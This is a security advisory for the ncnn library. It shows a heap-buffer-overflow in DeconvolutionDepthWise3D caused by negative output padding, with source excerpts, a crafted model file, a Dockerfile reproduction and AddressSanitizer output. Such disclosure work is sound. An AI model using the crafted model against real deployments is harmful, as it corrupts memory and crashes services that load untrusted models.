Heap Overflow From Negative Output Padding
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/deconvolutiondepthwise3d.cpp:134 in deconvolutiondepthwise3d
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted ncnn model can give DeconvolutionDepthWise3D a negative output_pad_right (param id 18) that cancels out a large kernel, so the layer allocates a 1x1x1 output tensor while still walking the full kernel footprint over it. The read-modify-write at src/layer/deconvolutiondepthwise3d.cpp:134 then runs hundreds of bytes past the output allocation, corrupting adjacent heap memory and aborting the process. The PoC drives it through ncnnoptimize, whose ModelWriter::shape_inference() executes every layer of the attacker's graph, but any ncnn::Net inference over the same model hits the identical path.
Detail
DeconvolutionDepthWise3D::load_param() takes output_pad_right/output_pad_bottom/output_pad_behind from param ids 18/19/20 and stores them as plain ints with no range check — negative values are accepted. forward() then folds them straight into the output geometry, and the resulting outw/outh/outd are used both to size the output tensor and, indirectly, as the strides the kernel-offset table walks:
// src/layer/deconvolutiondepthwise3d.cpp:233
int outw = (w - 1) * stride_w + kernel_extent_w + output_pad_right;
int outh = (h - 1) * stride_h + kernel_extent_h + output_pad_bottom;
int outd = (d - 1) * stride_d + kernel_extent_d + output_pad_behind;
// src/layer/deconvolutiondepthwise3d.cpp:89
space_ofs[p1] = p2;
p1++;
p2 += dilation_w;
// src/layer/deconvolutiondepthwise3d.cpp:131
for (int k = 0; k < maxk; k++)
{
float w = kptr[k];
outptr[space_ofs[k]] += val * w;
}
The offset table space_ofs is built from the kernel dimensions only (maxk = kernel_w * kernel_h * kernel_d), while the buffer it indexes is sized from outw/outh/outd. The two are normally kept consistent because outw >= kernel_extent_w, an invariant that only holds while output_pad_right >= 0.
The PoC sets 1=100 (kernel_w = 100), 11=1, 21=1, all strides and dilations 1, and 18=-99. For the 1x1x1x1 input that gives outw = (1-1)*1 + (1*(100-1)+1) + (-99) = 1, and likewise outh = outd = 1, so top_blob_bordered.create(1, 1, 1, 1, 4u, ...) at line 245 allocates an 84-byte region (16 bytes of payload, a 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD tail). maxk is still 100 and space_ofs[k] == k, so the loop at line 131 read-modify-writes outptr[0] through outptr[99] — 400 bytes into a channel that holds one float. The first access outside the 84-byte allocation is k = 21, which is exactly the READ of size 4 at "0 bytes after 84-byte region" that AddressSanitizer reports; the matching store would follow.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-overflow-from-negative-output-padding && cd ncnn-poc-heap-overflow-from-negative-output-padding
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=1 11=1
DeconvolutionDepthWise3D deconv 1 1 data out 0=1 1=100 6=100 11=1 21=1 18=-99 19=0 20=0
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x65093d22c232 bp 0x7ffc8a0a96e0 sp 0x7ffc8a0a96d0
READ of size 4 at 0x50e000000154 thread T0
#0 0x65093d22c231 in deconvolutiondepthwise3d /ncnn/src/layer/deconvolutiondepthwise3d.cpp:134
#1 0x65093d23398b in ncnn::DeconvolutionDepthWise3D::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/deconvolutiondepthwise3d.cpp:250
#2 0x650934749f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#3 0x65093473bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#4 0x65093479b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#5 0x65093462d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#6 0x6509346aaeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#7 0x7083951371c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x70839513728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x65093462a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
#0 0x7083957b0f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x6509346bf68e in fastMalloc /ncnn/src/allocator.h:62
#2 0x6509346bf68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x6509346fc7ef in ncnn::Mat::create(int, int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:455
#4 0x65093d2334dc in ncnn::DeconvolutionDepthWise3D::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/deconvolutiondepthwise3d.cpp:245
#5 0x650934749f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#6 0x65093473bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x65093479b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x65093462d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x6509346aaeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x7083951371c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x70839513728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x65093462a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/deconvolutiondepthwise3d.cpp:134 in deconvolutiondepthwise3d
Credit
Zheng Yu @ DepthFirst